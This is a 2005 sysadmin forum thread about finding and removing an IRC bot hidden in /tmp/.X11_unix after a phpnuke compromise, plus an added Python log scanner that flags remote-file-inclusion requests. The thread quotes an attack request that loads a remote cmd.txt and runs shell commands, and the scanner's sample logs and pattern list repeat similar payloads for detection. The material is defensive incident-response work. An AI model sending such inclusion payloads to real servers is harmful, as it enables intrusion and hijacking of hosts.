Red Hat Topics - .X11_unix/.unix


Mark D Smith

2005-09-06, 5:52 pm

Hi

A customer is running an IRC program. I am having problems finding who has
the files installed under /tmp/.X11_unix/.unix with UID/GID apache.

This is on FC3

Google does not bring up much, and apart from firewalling ports 666x to 6669
and killing the daemon, any pointers are welcomed.

Mark

Jake

2005-09-08, 5:48 pm

Mark D Smith wrote:
> Hi
>
> A customer is running an IRC program. I am having problems finding who has
> the files installed under /tmp/.X11_unix/.unix with UID/GID apache.
>
> This is on FC3
>
> Google does not bring up much, and apart from firewalling ports 666x to 6669
> and killing the daemon, any pointers are welcomed.
>
> Mark
>



....if it's a customer, grep /var/html/www or /home/*/public_html for
'irc' and see what it brings up. You can use lsof to see what's opening
those files, or use ps to keep an eye on what processes are active.

....if it's *not* a customer... Doh!


Mark D Smith

2005-09-08, 5:48 pm


"Jake" <NoSpamForMe@here.tld> wrote in message
news:5rWTe.15065$I02.892219@news20.bellglobal.com...
> Mark D Smith wrote:
>
>
> ...if it's a customer, grep /var/html/www or /home/*/public_html for
> 'irc' and see what it brings up. You can use lsof to see what's opening
> those files, or use ps to keep an eye on what processes are active.
>
> ...if it's *not* a customer... Doh!
>
>

It looks like another issue with phpnuke. Found this in an access_log of a
customer:

/home/domain/domain110/logs/access_log:200.32.121.22 - -
[03/Sep/2005:08:44:34 +0100] "GET
/phpnuke/gallery/displayCategory.php?adminpath=http://clientes.netvisao.pt/j
mascare/cmd.txt?&cmd=cd%20/tmp/.X11_unix;ls%20-a HTTP/1.0" 200 487 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"

along with a host of other refs to .X11_unix

Needless to say, we disabled the customer's phpnuke and informed them to
contact the authors for a patch or newer version.

Mark
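The access_log entry above has the shape of a remote file inclusion probe: a query parameter pointing at a remote URL, followed by a second parameter carrying shell text. As an added example (not code from the thread or from phpnuke), here is a small Python scanner for Apache combined-format logs that flags such requests for review; the addresses, the attacker.example host and the log lines are constructed, with the first line mirroring the one quoted in the thread.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log line; only the fields the scan needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Fragments that have no business in a CMS query-string value.
SHELL_HINTS = (';', '|', '`', '/tmp/', 'wget ', 'curl ')

def suspicious_params(url):
    """Return (name, decoded_value, reason) for each query parameter whose
    value points at a remote URL (remote file inclusion) or carries
    shell-like text. Pairs are split on '&' only, so a ';' inside a value
    stays visible instead of being treated as a separator."""
    query = url.partition('?')[2]
    findings = []
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, raw = pair.partition('=')
        value = unquote_plus(raw)          # decode %20, %3A, '+' etc. first
        if REMOTE_URL.match(value):
            findings.append((name, value, 'remote-include'))
        elif any(hint in value for hint in SHELL_HINTS):
            findings.append((name, value, 'shell-like'))
    return findings

def scan_access_log(lines):
    """Return one dict per request that carries at least one suspicious parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                        # not a combined-format line; skip
        findings = suspicious_params(m['url'])
        if findings:
            hits.append({'ip': m['ip'], 'time': m['ts'], 'status': m['status'],
                         'path': m['url'].partition('?')[0], 'findings': findings})
    return hits

# Constructed sample lines (placeholder addresses and host), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Sep/2005:08:44:34 +0100] "GET /phpnuke/gallery/displayCategory.php'
    '?adminpath=http://attacker.example/cmd.txt?&cmd=cd%20/tmp/.X11_unix;ls%20-a HTTP/1.0" '
    '200 487 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.9 - - [03/Sep/2005:09:01:12 +0100] "GET /phpnuke/gallery/displayCategory.php'
    '?cat=12 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [03/Sep/2005:09:02:40 +0100] "GET /phpnuke/modules.php'
    '?name=News&file=http%3A%2F%2Fattacker.example%2Fx.txt%3F HTTP/1.0" 200 311 "-" "-"',
]

if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit['ip'], hit['status'], hit['path'])
        for name, value, reason in hit['findings']:
            print('   ', reason, name, '=', value)
```

A 200 status on a flagged request is worth prioritising, as in the thread, since it suggests the include succeeded rather than being rejected.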

Jake

2005-09-08, 5:48 pm

Mark D Smith wrote:
> "Jake" <NoSpamForMe@here.tld> wrote in message
> news:5rWTe.15065$I02.892219@news20.bellglobal.com...
>
>
> It looks like another issue with phpnuke. Found this in an access_log of a
> customer:
>
> /home/domain/domain110/logs/access_log:200.32.121.22 - -
> [03/Sep/2005:08:44:34 +0100] "GET
> /phpnuke/gallery/displayCategory.php?adminpath=http://clientes.netvisao.pt/j
> mascare/cmd.txt?&cmd=cd%20/tmp/.X11_unix;ls%20-a HTTP/1.0" 200 487 "-"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
>
> along with a host of other refs to .X11_unix
>
> Needless to say, we disabled the customer's phpnuke and informed them to
> contact the authors for a patch or newer version.
>
> Mark
>


That'll do it. Mind if I ask how you discovered the intrusion?

Mark D Smith

2005-09-08, 5:48 pm


"Jake" <NoSpamForMe@here.tld> wrote in message
news:wNZTe.16121$I02.925006@news20.bellglobal.com...
<snip>
> That'll do it. Mind if I ask how you discovered the intrusion?


Routine check of /tmp dir for hidden files found .X11_unix dir, which I did
not know what it was. Looked at the files and found the dreaded irc
mentioned; Google found nothing of much help.

Used ps and netstat to find what was running, killed and removed the files.

Post-checked with rkhunter and all looks clean.

Mark

Jake

2005-09-08, 5:48 pm

Mark D Smith wrote:
> "Jake" <NoSpamForMe@here.tld> wrote in message
> news:wNZTe.16121$I02.925006@news20.bellglobal.com...
> <snip>
>
>
>
> Routine check of /tmp dir for hidden files found .X11_unix dir, which I did
> not know what it was. Looked at the files and found the dreaded irc
> mentioned; Google found nothing of much help.
>
> Used ps and netstat to find what was running, killed and removed the files.
>
> Post-checked with rkhunter and all looks clean.
>
> Mark
>


rkhunter is a great tool. I use it in conjunction with chkrootkit and
tripwire. Makes for a lot of logs every morning but at least I know
what's going on. Most of the time anyway, nothing's ever 100%. :\
Copyright 2003 - 2008 webservertalk.com